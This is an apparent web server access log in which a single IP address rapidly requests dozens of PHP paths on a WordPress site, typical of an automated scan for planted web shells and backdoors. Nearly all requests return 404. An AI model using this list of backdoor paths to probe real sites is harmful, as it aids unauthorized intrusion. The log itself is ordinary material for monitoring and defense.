48.210.70.5 - - [01/Dec/2025:18:51:20 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fabout.php&reauth=1 HTTP/1.1" 200 8681 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:20 +0800] "GET /gmo.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:20 +0800] "GET /wp-includes/ID3/about.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:20 +0800] "GET /css/index.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:21 +0800] "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:21 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:21 +0800] "GET /filemanager/dialog.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:21 +0800] "GET /wp-admin/maint/index.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:21 +0800] "GET /wp-includes/customize/about.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:21 +0800] "GET /index/function.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:21 +0800] "GET /uploads/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:22 +0800] "GET /wp-includes/style-engine/about.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:22 +0800] "GET /ww1.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:22 +0800] "GET /about/function.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:23 +0800] "GET /admin/function.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:23 +0800] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:23 +0800] "GET /css/colors/blue/index.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:23 +0800] "GET /security.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:24 +0800] "GET /wp-admin/user/about.php HTTP/1.1" 302 5 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:25 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fuser%2Fabout.php&reauth=1 HTTP/1.1" 200 8686 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:26 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:26 +0800] "GET /wp-content/upgrade/about.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:26 +0800] "GET /wp-includes/assets/index.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:26 +0800] "GET /wp-content/radio.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:26 +0800] "GET /wp-includes/fonts/index.php?p= HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:26 +0800] "GET /.well-known/admin.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:27 +0800] "GET /wp-content/admin.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:27 +0800] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:27 +0800] "GET /wp-content/themes/twentytwentytwo/index.php?p= HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:27 +0800] "GET /.well-known/log.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:27 +0800] "GET /class.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:27 +0800] "GET /bless5.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:27 +0800] "GET /wp-includes/js/codemirror/index.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:28 +0800] "GET /wp-includes/block-patterns/index.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:28 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:28 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:28 +0800] "GET /ioxi-o1.php HTTP/1.1" 404 27 "-" "-"
48.210.70.5 - - [01/Dec/2025:18:51:28 +0800] "GET /juuuu.php HTTP/1.1" 404 27 "-" "-"
